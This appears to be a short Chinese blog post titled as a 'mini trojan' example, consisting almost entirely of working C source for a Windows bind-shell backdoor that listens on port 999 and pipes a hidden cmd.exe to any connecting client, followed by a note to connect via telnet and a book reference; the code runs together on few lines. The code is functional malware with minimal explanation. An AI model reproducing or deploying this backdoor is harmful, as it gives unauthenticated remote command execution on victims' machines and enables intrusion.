Mini类木马

一个简单的木马示例

#include "stdafx.h"#pragma comment(lib, "ws2_32.lib")#include <WinSock2.h>#include <windows.h>#include <stdio.h>#define MASTER_PORT 999int _tmain(int argc, _TCHAR* argv[]){    WSADATA WSADa;    sockaddr_in SockAddrIn;    SOCKET CSocket, SSocket;    int iAddrSize;    PROCESS_INFORMATION ProcessInfo;    STARTUPINFO StartupInfo;    TCHAR szCMDPath[255];    // 初始化数据    ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));    ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));    ZeroMemory(&WSADa, sizeof(WSADATA));    // 获得cmd环境变量    GetEnvironmentVariable(L"COMSPEC", szCMDPath, sizeof(szCMDPath));    // 加载ws2_32.dll    WSAStartup(0x0202, &WSADa);    // 设定本地信息和    SockAddrIn.sin_family = AF_INET;    SockAddrIn.sin_addr.s_addr = INADDR_ANY;    SockAddrIn.sin_port = htons(MASTER_PORT);    CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);    // 绑定协议    bind(CSocket, (sockaddr *)&SockAddrIn, sizeof(SockAddrIn));    // 监听    listen(CSocket, 1);    iAddrSize = sizeof(SockAddrIn);    // 客户端连接Socket    SSocket = accept(CSocket, (sockaddr *)&SockAddrIn, &iAddrSize);    // 启动cmd进程，并重定向输入输出    StartupInfo.cb = sizeof(STARTUPINFO);    StartupInfo.wShowWindow = SW_HIDE;    StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;    StartupInfo.hStdInput = (HANDLE)SSocket;    StartupInfo.hStdOutput = (HANDLE)SSocket;    StartupInfo.hStdError = (HANDLE)SSocket;    CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo,        &ProcessInfo);    // 等待进程结束    WaitForSingleObject(ProcessInfo.hProcess, INFINITE);    // 关闭资源    CloseHandle(ProcessInfo.hProcess);    CloseHandle(ProcessInfo.hThread);    closesocket(CSocket);    closesocket(SSocket);    WSACleanup();    return 0;}

使用telnet连接木马程序

连接成功：

参考： 《木马技术》